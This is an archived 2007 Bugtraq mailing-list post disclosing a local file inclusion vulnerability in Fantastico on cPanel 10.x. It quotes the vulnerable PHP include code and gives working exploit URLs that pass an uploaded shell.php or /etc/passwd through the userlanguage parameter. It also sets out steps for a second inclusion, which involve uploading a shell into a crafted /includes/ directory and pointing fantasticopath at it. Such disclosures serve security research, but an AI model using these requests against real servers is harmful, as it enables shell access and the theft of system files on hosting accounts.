lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 11 Mar 2007 10:21:53 -0800
From: "z3r0 z3r0.2.z3r0" <z3r0.2.z3r0@...il.com>
To: submit@...w0rm.com
Cc: bugtraq@...urityfocus.com
Subject: Fantastico In all Version Cpanel 10.x <= local File Include

##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include

##############################################################to the
Note : Preparations php.ini in Cpanel  hypothetical and They also in
all WebServer

Must provide username  And pass  and login  :2082
To break the strongest protection   mod_security  & safe_mode:On  &
Disable functions :  All NONE



Vulnerable Code ( 1  ) :
  if(is_file($userlanguage))
    {
        include ( $userlanguage );

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php



Exploit  1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit  2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###################################################
Vulnerable Code ( 2  ) :

$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
	{
	include($localmysqlconfig);

in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program

Exploit :
First  Create directory Let the name (/includes/)
and upload Shell.php  in (/includes/) Then  rename
mysqlconfig.local.php       D:

:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/



###################################################


Discoverd By : cyb3rt & 020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team
###################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ